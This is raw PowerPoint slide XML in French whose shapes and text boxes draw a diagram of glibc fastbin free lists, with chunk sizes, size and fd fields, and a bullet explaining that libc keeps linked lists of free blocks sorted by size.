                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8032DBC8-F394-6B02-F948-D92D0F8D44E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="637874" y="2078920"/>
            <a:ext cx="1609154" cy="2883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Fastbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CF80674-0AFE-4B69-3C2B-CA5674282948}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2786850" y="2078920"/>
            <a:ext cx="1624335" cy="2827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Fastbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DDDBC5B-A549-9FFF-5BB6-F77414B12D61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7099923" y="2078920"/>
            <a:ext cx="1624335" cy="2902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Fastbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8700EEE-731A-EFDE-46BA-B3143F63B3C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4934025" y="2078920"/>
            <a:ext cx="1624335" cy="2883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t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E2769A5-90DC-3A26-D29C-8D65D5DCA130}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="631185" y="2844698"/>
            <a:ext cx="1624334"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13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBE492B7-0C48-53BE-027F-4D30D9D95222}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="631184" y="3111493"/>
            <a:ext cx="1624333" cy="4997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14" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFD3EB7E-4DFB-DA8E-8B8E-49C213C05452}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1975583" y="2586367"/>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15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A2FA62D-4D99-5762-4930-D3233F23D349}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="631184" y="2586367"/>
            <a:ext cx="77342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16" name="Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D13400E9-E1A0-227C-82F4-04AEF4737535}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1688248" y="2586366"/>
            <a:ext cx="287335"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17" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DC38144-08B1-FAA5-6A22-C47165995A8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1404612" y="2586367"/>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19" name="Rectangle 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB8ABC7D-BEBE-6F3C-4C62-AFAEE36A2315}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="631185" y="4063626"/>
            <a:ext cx="1624334"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20" name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA171361-F020-1CC9-C116-15FC9F479C3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="631184" y="4330421"/>
            <a:ext cx="1624333" cy="4997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1" name="Rectangle 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F8152B0-9878-F676-9BF8-25448F0403CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1975583" y="3805295"/>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22" name="Rectangle 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C223B5B1-EF72-1E45-8E76-57A1937AEB29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="631184" y="3805295"/>
            <a:ext cx="77342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23" name="Rectangle 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6ADCB1A8-3013-087A-1F73-BDF6E4FD2FDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1688248" y="3805294"/>
            <a:ext cx="287335"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24" name="Rectangle 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6523186E-636E-29E7-42C2-73CE19B42E21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1404612" y="3805295"/>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25" name="Rectangle 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4ECF56B2-8FBD-ECE9-1824-6F49FE0DCB86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2786854" y="2844698"/>
            <a:ext cx="1624334"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26" name="Rectangle 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08C8E3F2-E2F7-7936-0955-BB89D95EB0E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2786853" y="3111493"/>
            <a:ext cx="1624333" cy="4997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27" name="Rectangle 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEF79768-B5D4-6AD6-03DD-5FFC63F0D40C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4131252" y="2586367"/>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28" name="Rectangle 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B17E2A81-1F51-FF1A-E034-C724B6CA1D71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2786853" y="2586367"/>
            <a:ext cx="77342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29" name="Rectangle 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{619587DA-296F-8A91-989E-AA66FDD48C8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3843917" y="2586366"/>
            <a:ext cx="287335"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30" name="Rectangle 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DD3E41C-ADB1-EF3D-6675-D8DA7087DD92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3560281" y="2586367"/>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31" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7751A864-9317-C958-05E5-FD8F0F0638C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7098183" y="2747231"/>
            <a:ext cx="1624334"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32" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B17E2177-457E-0FF5-492C-E0D667FBCDC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7098180" y="3000318"/>
            <a:ext cx="1624333" cy="4997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33" name="Rectangle 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{135227AA-C2A5-EB0A-D938-A8A70BEE4541}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8442581" y="2488900"/>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34" name="Rectangle 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD8C87E5-B14B-DC8D-E4F3-DC41F4B5A675}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7098182" y="2488900"/>
            <a:ext cx="77342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35" name="Rectangle 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED57ACEB-FAA7-141D-65A2-EDCE8B97C375}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8155246" y="2488899"/>
            <a:ext cx="287335"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36" name="Rectangle 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A448C384-38C9-A524-3B4E-6FDDE08F4AA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7871610" y="2488900"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Rectangle 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F0B40B1-8641-B37E-FC4F-4122EFFC33F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7098186" y="3997257"/>
            <a:ext cx="1624334"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fd</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Rectangle 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7486C8CB-5B1A-6C9A-9DAD-396D75C5CA23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7098185" y="4264052"/>
            <a:ext cx="1624333" cy="4997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sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Rectangle 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C30CAF1-77E1-7469-DEE6-E8B0BFD2C54D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8442584" y="3738926"/>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P</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Rectangle 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9676AE1F-E0C5-C5A3-205B-DAB787EADB83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7098185" y="3738926"/>
            <a:ext cx="77342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size</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Rectangle 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45FD8340-58C4-36BB-C1E8-E571EE9B2B0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8155249" y="3738925"/>
            <a:ext cx="287335"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M</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Rectangle 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A82353FD-32C7-70A1-CCA6-9524DD76F492}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7871613" y="3738926"/>
            <a:ext cx="279937" cy="2583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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="48" name="Connecteur : en angle 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B45B1B51-529D-78FF-7CC6-BA79466CD48F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="8" idx="3"/>
            <a:endCxn id="15" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="631184" y="2223105"/>
            <a:ext cx="6690" cy="492427"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 351704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0" name="Connecteur : en angle 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{058A16F5-8F50-6177-9527-16B3A559B9F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="12" idx="3"/>
            <a:endCxn id="22" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="631185" y="2973863"/>
            <a:ext cx="1" cy="960597"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 2286010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6" name="Connecteur : en angle 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C4EC51E-CED8-2990-55BD-CB1D48C69C88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9" idx="3"/>
            <a:endCxn id="28" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="2786849" y="2220273"/>
            <a:ext cx="3" cy="495260"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -762000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Connecteur : en angle 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECAD3C34-5928-5D8E-E2D7-B0B66271FCBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="10" idx="3"/>
            <a:endCxn id="34" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="7098183" y="2224034"/>
            <a:ext cx="1741" cy="394031"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1323038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4" name="Connecteur : en angle 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11B21729-022E-A45F-3A69-6FD39A8B8F31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="31" idx="3"/>
            <a:endCxn id="40" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="7098183" y="2876396"/>
            <a:ext cx="2" cy="991695"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -1143000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7" name="ZoneTexte 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A053C33A-1B25-DEFA-0E94-DA4EF00A20D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="509263" y="1750725"/>
            <a:ext cx="1868173" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> size : 0x10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="ZoneTexte 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{406E0E9D-0A44-8A59-9F1E-AA0692C15BCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2626193" y="1773849"/>
            <a:ext cx="1868173" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> size : 0x18</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="ZoneTexte 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0A25375-2E55-73C9-1A79-15AA2AA0D1FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6937526" y="1760368"/>
            <a:ext cx="1868173" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> size : 0x58</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="ZoneTexte 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8027F8FB-4EE1-0F2C-574E-B95F655228EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365126" y="1172094"/>
            <a:ext cx="7153800" cy="507831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> maintient des listes chainées de bloc libre classé par taille</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
